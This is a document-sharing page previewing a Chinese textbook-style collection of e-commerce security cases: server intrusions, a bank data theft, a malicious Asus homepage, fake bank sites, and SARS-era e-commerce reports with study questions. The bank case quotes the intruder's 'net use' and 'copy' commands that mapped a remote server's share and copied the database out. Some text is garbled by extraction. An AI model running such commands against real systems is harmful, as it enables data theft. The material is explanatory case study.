《电子商务安全案例》word版.doc_第1页
《电子商务安全案例》word版.doc_第2页
《电子商务安全案例》word版.doc_第3页
《电子商务安全案例》word版.doc_第4页
《电子商务安全案例》word版.doc_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

电子商务安全案例在考查电子商务链上每个逻辑链条时,为保证安全的电子商务所必须保护的资产包括客户机、在通信信道上传输的消息、WWW和电子商务服务器(包括服务器端所有的硬件)。电影中商业间谍主要是窃听各种通信设备,如电话线和卫星通信线路。虽然电信通道是需要保护的主要的资产之一,但并不是计算机和电子商务安全所考虑的惟一因素。例如,如果通信连接是安全的,而客户机上有一个病毒,这个病毒就会污染要安全传输到WWW或电子商务服务器上的信息,这时商务交易的安全就像客户机一样不安全了对客户机的安全威胁在可执行的HTML编制的,WWW内容出现前,页面是静态的。静态页面是以WWW标准页面描述语言其作用只是显示内容并提供到其他页面的链接。在活动内容广泛应用后,这个状况就发生变化了。1.活动内容该网站运行于Solaris2.5上,系统管理员经常发现网站的管理模块有不明用户进入,入侵者能用管理员的帐号查看,修改用户数据,查看用户密码。从6月以来不断有用户投诉密码被更改,邮箱邮件被别人收走。还有的栏目信息被入侵者修改,换成莫名其妙的内容,更猖狂的是,该入侵者居然公然加了一个自己的帐号,并将其设置为管理员。经本站安全技术人员C检查,其网站至少存在2个致命漏洞,一个中等程度的漏洞和若干个配置错误。其中一个致命漏洞在于RPC程序中的一个守护进程。该守护进程的漏洞在Internet上发布已经有半年,但管理员既没有对该进程的程序打补丁,也没有关掉该服务。实际上这个服务是没有必要打开的。这个守护进程中存在一个缓冲区溢出错误,并且有黑客针对该错误写了一段攻击程序,公布在黑客BBS上。该攻击程序通过缓冲区溢出错误可以使入侵者在这台机器上用任何身份执行任何指令。该溢出发生的时候这个守护进程程序报错,这表明入侵者的确是利用这个漏洞进入系统的。该网站上的另一个中等程度的漏洞是finger服务,该服务暴露了这台机器的用户名。本站安全技术人员通过修改系统初始化文件和修补漏洞的工作以后,有效地防止了以后同类现象发生。该网站从7月中开始运行到现在没有出现过有关安全的投诉.1.借刀杀人,破坏某电子公司的数据库(2001年2月12日)时间:1999年11月该网站运行于Windows NT 4.0上,web server为IIS4.0,补丁号为Service Pack5。该网站管理员在11月的某一天发现其web网站上的用户资料和电子配件数据库被入侵者完全删除!严重之处更在于该数据库没有备份,网站运行半年来积累的用户和资料全部丢失。系统管理员反复检查原因,通过web日志发现破坏者的调用web程序记录,确定了当时用户的IP是202.103.xxx.xxx(出于众所周知的原因这里隐藏了后两位),而这个IP来自于某地一个ISP的一台代理服务器。这个202.103.xxx.xx的服务器安装了Wingate的代理软件。破坏者浏览电子公司的网站是用该代理访问的。这件事情给电子公司带来的损失是很严重的,丢失了半年的工作成果。入侵者同时给202.103.xxx.xxx带来了麻烦,电子公司报了案,协查通报到了202.103.xxx.xxx这个ISP所在地的公安局。该代理服务器的系统管理员是本站一位技术人员F的朋友。F通过对受害者的服务器进行安全检查发现了原因。首先,其端口1433为开放,SQL数据库服务器允许远程管理访问;其次,其IIS服务器存在ASP的bug,允许任何用户查看ASP源代码,数据库管理员帐号sa和密码以明文的形式存在于ASP文件中。有了这两个条件,破坏者可以很容易地连上SQL数据库,以最高身份对数据库执行任意操作。对于该漏洞的补丁,请下载本站的ASP bug补丁修复程序。台湾黑客对某政府网站的攻击时间:1999年8月该网站运行的系统是SunOS,版本比较旧。当时大陆黑客出于对李登辉quot;两国论quot;谬论的愤慨,为谴责李登辉的分裂行径,于8月份某日,一夜之间入侵了数十个台湾政府站点。台湾黑客采取了报复行动,替换了这个网站的首页。经本站技术人员P分析,在该系统上实际存在至少4个致命的弱点可以被黑客利用。其中有两个RPC守护进程存在缓冲区溢出漏洞,一个CGI程序也有溢出错误。对这些漏洞要采用比较特殊的攻击程序。但台湾黑客并没有利用这些比较高级的攻击技巧,而是从一个最简单的错误配置进入了系统。原来,其缺省帐号infomix的密码与用户名相同!这个用户的权限足以让台湾黑客对web网站为所欲为。从这件事情可以看出,我们有部分系统管理员不具备最起码的安全素质。案例四:东亚某银行时间:1999年12月该网站为WindowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug的非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过Email授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use*xxx.xxx.xxx.xxxc$passwd/user:quot;administratorquot;),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt.逐个检查这些文件发现,这些文件大部分是dir c:gt;x.txt和dir c:datagt;x.txt生成的结果。这些文件通过的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:winntsystem32logfiles下面。(入侵者删除了c:winntsystem32logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了copy c:datadb1.dat h:,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了c:winntsystem32logfiles下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是Domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。华硕官方网站遭黑客攻击公司被迫关闭服务器Exploit Prevention Labs的首席技术官罗杰-汤姆森(Roger Thompson)透露,该攻击代码隐藏在网站主页的一个HTML元素中,并试图从另一台服务器上下载恶意代码。截止周五下午,这台服务器已经停止工作,虽然黑客们还可转移攻击目标,不过此次攻击的危险性已经下降。4月6日据外电报道电脑零部件生产商华硕的网站遭到黑客攻击,黑客利用本周才修复的一个Windows系统中的紧急漏洞,通过该网站的服务器发送恶意代码。Exploit Prevention Labs的首席技术官罗杰-汤姆森(Roger Thompson)透露,该攻击代码隐藏在网站主页的一个HTML元素中,并试图从另一台服务器上下载恶意代码。截止周五下午,这台服务器已经停止工作,虽然黑客们还可转移攻击目标,不过此次攻击的危险性已经下降。华硕的营销经理大卫-雷(David Ray)不能证实网站是否被黑,只称公司的网站看起来没有受到威胁。此恶意代码之所以受到特别关注,是因为它利用了本周才修复的一个紧急的Windows动画光标漏洞。瞄准该漏洞的恶意代码已经出现了一个多星期,在安装了补丁前如果用户访问了华硕网站,可能会危及电脑的安全。Kaspersky Lab也证实了华硕网站被黑,同时证实被黑客利用的网站在周五都已关闭,黑客们无法下载恶意代码。汤姆森认为,华硕网站的被黑显示出,即使是人们信赖的网站也可能存在安全隐患。他表示,如果像华硕这样的大公司都能被黑并感染上病毒,其他网站可想而知。安全案例:(1)2007年底施行的北京市信息化促进条例明确规定,利用互联网从事经营活动的单位和个人应当依法取得营业执照,并在网站主页面上公开经营主体信息。商务部发布的关于网上交易的指导意见(暂行)也让我们可以预见,经营主体身份信息公开的趋势势不可挡。名索验证可以说是在当前电子商务政策环境和安全环境下电子商务行业在身份、信息验证与信息公开方面的一大创新,她以权威的工商企业数据为基础,用户只要点击网站或企业商户悬挂的名索验证的红色印章图标,就可以实时在线的查看经过验证后的该企业的工商登记信息,如:注册号、企业类型、注册资本、法人姓名、经营范围、企业状态、年检信息.等14项,另外还有股东信息和董事经理监事信息可自主选择是否公开。通过验证信息的展示,为用户提供该企业在线的身份证明和相关信息,开创了电子商务行业利用工商数据实时提供在线企业身份证的先河。电子商务主要是网络环境下,买卖双方在不谋面的情况下发生资金流、物流与信息流交互的商业运营模式,与传统的交易模式相比,她最大的特点是虚拟性,也正因为如此,才使电子商务行业的安全和诚信问题成为行业发展的最大制约因素。名索验证的推出,旨在为参与网络交易的企业提供在线的企业身份证明,可以从根本上防范类似风险,因为通过名索验证的企业代表着她身份的合法性和信息的真实性,名索验证即企业在线身份证最大特点在于:权威名索验证使用权威的数据源对企业的信息进行比对和验证。实时名索验证运用先进的互联网技术保持验证展示信息和数据源的同步。展现名索验证通过互联网手段提供展示页面公开企业部分权威信息。增值服务名索验证为用户提供了丰富的增值产品。与当前电子商务行业采用的相关认证相比,她最大的优势在于名索验证可以保持验证展示信息和数据源同步,与企业登记信息的变化保持一致,保证验证企业信息的权威、实时、可靠,避免验证因时效等因素,出现展示信息与实际企业状态、信息不符,为电子商务交易安全提供可靠保障。助力电子商务交易安全名索验证以权威的工商数据、专业的技术团队、雄厚的品牌底蕴为依托,保障验证信息的权威、实时、可靠之外,可以在短时间内完成电子商务平台内数十万、仍至更多企业会员的验证。同时其奉献、共赢的市场策略,更可让电子商务平台受益匪浅。据悉,近期将有近十家知名电子商务平台统一使用名索验证对其企业会员进行验证,数十万企业将佩戴名索验证的红印章,在线企业身份证的投入使用将在电子商务行业扬起代表合法与真实的红色旋风。捍卫电子商务安全环境,助力电子商务交易安全是名索验证诞生的使命,相信随着名索验证的普及应用,电子商务的安全环境将得到极大的改善。(2)38.2003年春季我国流行非典型性肺炎期间,电子商务凸显其独有的优势。非典引起的实体市场的萧条导致了虚拟市场的火爆,人们真正体验到电子商务带来的安全、便利与快捷。下面是两篇相关报道:福州盛行电子商务26%企业青睐网上交易中新网福州2003年6月22日电:福州市企业调查队日前公布对该市八大行业113家企业电子商务使用调查情况。目前有43%的企业建立了对外的企业网站,21%的企业正在筹建;26%的企业开展了电子商务活动,其中交易量占贸易总额10%以上的占47%。调查显示,为防治非典,人们自觉减少了面对面的接触,企业改变了以往在宾馆、酒楼洽谈生意的传统方法,正逐渐重视网络技术对扩大企业影响,增强与外界的联系,拓宽企业生存、发展空间的作用。有82%的企业认为有必要开展电子商务活动,在未建网站或未开展电子商务的企业中有73%的企业正在考虑筹建网站或开展电子商务活动。调查还表明,非典时期促进了电子银行业务的大增,更多的人选择电话、上网方式相互沟通联系、办理多项业务,自四月中旬到五月底,福建省建设银行系统网上交易额比去年同期增长3.7倍;省工商行在非典疫情发生后网上交易额也增加了20亿元人民币。上海电子商务走进夏季网上交易服务一路走红新华网上海2003年6月7日电:非典时期,在接触式经济遭遇严寒之际,以跨越时空、不正面接触为特点的电子商务赢得了商机。在上海,企业和商家纷纷借助信息技术和网络平台,改变服务和交易方式,网上购物、网上交易数量激增,沉寂多时的电子商务迅速升温。上海市电子商务行业协会最新统计显示,非典时期,上海生产资料网上交易量平均上升50%,生活资料网上交易量上升100%,个人之间的网上交易量平均上升30%。譬如,东方钢铁在线2月份网上交易额为700吨,3月份增加到6000吨,4月21日到25日5天就达5000吨。爱姆意在线2002年1-4月网上交易额为5000万元,2003年同期达1.1亿元。2004年1-4月,易购365、联华OK的网上订购量也比去年同期翻了一番,送货人员增加了80%。根据上述案例并结合抗击非典的亲身经历,请回答下列问题:(1)非典对电子商务产生了哪些影响?(2)电子商务在非典时期发挥了什么作用?(3)有人说,非典的流行是电子商务发展的一个良机,你对此有何认识?试通过本案例分析电子商务发展的偶然性和必然性。(3)(4)作为高科技犯罪的典型代表之一,银行网络安全事故近两年来在国内频频发生。去年年末,互联网上连续出现的假银行网站事件曾经轰动一时。一个行标、栏目、新闻、图片样样齐全的假冒中国银行网站,竟然成功划走了呼和浩特一名市民银行卡里的2.5万元。且随后不久,假工行、假农行、假银联网站也相继跟风出现。而早在2003年下半年,我国香港地区也曾出现不法分子伪冒东亚、花旗、汇丰、宝源投资及中银国际网站。2004年2月的一段时间,长沙发生利用木马病毒盗窃网络银行资金案,造成损失8万余元,直到现在谈起木马病毒,很多人仍然心惊胆战。安徽省人行是中国人民银行领导下的省级分行,作为央行的分支系统,在数据大集中趋势尽显的今天,其网内数据呈现出几何量级快速增长的态势。李鹰告诉记者:安徽人行每天都会发生数亿笔银行内部、银行之间、银行与企业之间的存款、取款、交易、支付、结算业务,也就是说每天都会面临对海量数据和繁杂数据信息的种种处理任务,比如对数据的过滤、关联、评价、检索、提取、摘录、核查等等,而更重要的是这些巨量业务,绝大部分都要通过网络完成。仅以自2000年起对商业银行开放的安徽人行全省信贷登记系统为例,这个至今存有至少7万多家企事业单位的基本信用信息和近40万笔信贷数据的系统,一年中接受全省金融机构的查询次数就会高达18万次。在目前病毒种类繁多、新型病毒尤其是混合型病毒层出不穷的网络环境下,其危险性之高可想而知。而与此同时,为保障人行对外提供业务服务的质量而时时对外开放的大量业务数据、办公公文等电子数据信息资产,也必须要通过保障内联服务器的永续运行,才能确保外界能够对其实现不间断访问,从而实现全行信息资源和系统资源的共享,及总行、大区行与各分支行之间的信息传输。但是,如何适应大范围网络环境

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论